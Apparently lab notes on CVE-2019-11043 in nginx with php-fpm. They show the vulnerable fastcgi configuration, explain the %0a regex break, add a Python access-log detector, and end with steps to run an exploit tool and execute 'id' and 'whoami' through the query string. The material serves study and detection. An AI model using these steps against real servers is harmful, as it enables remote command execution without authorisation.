CVE-2019-11043
Servers running nginx + php-fpm with a specific configuration are vulnerable.
The configuration in question:
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
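A newline character (%0a) can be used to break the regexp in the fastcgi_split_path_info directive. With the regexp broken, PATH_INFO ends up empty, which triggers the vulnerability.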
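The regexp failure described above can be reproduced and turned into a log check. This is an added example, not part of the original notes: it models the two patterns from the configuration with Python's re module (where, as in PCRE, "." does not match a newline) and flags access-log requests whose trailing path data would leave PATH_INFO empty. The log format and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Patterns copied from the nginx configuration shown on this page.
LOCATION_RE = re.compile(r"[^/]\.php(/|$)")
SPLIT_RE = re.compile(r"^(.+?\.php)(/.*)$")
# Assumed log format: quoted request line, as in nginx's default "combined" format.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def split_path_info(decoded_path):
    """Model of fastcgi_split_path_info: (script_name, path_info).
    When the regex does not match, path_info stays empty."""
    m = SPLIT_RE.match(decoded_path)
    return (m.group(1), m.group(2)) if m else (decoded_path, "")

def breaks_split(request_target):
    """True if the request enters the .php location with trailing path data,
    yet the split regex fails and PATH_INFO would be empty."""
    path = unquote(request_target.split("?", 1)[0])
    if not LOCATION_RE.search(path):
        return False
    _, path_info = split_path_info(path)
    return ".php/" in path and path_info == ""

def flag_log_lines(lines):
    """Return the request targets from access-log lines that break the split."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and breaks_split(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php/user/1 HTTP/1.1" 200 40',
    '192.0.2.66 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php/AAA%0aBBB?x=1 HTTP/1.1" 502 0',
    '192.0.2.10 - - [01/Jan/2020:10:00:03 +0000] "GET /css/site.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for target in flag_log_lines(SAMPLE_LOG):
        print("PATH_INFO split broken by:", target)
```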
source /etc/profile
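go run . "http://192.168.64.142:8080/index.php"
Request http://192.168.64.142:8080/index.php?a=id several times.
Because php-fpm starts multiple child processes, /index.php?a=id has to be requested several times in order to reach a process that has been polluted.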
http://192.168.64.142:8080/index.php?a=whoami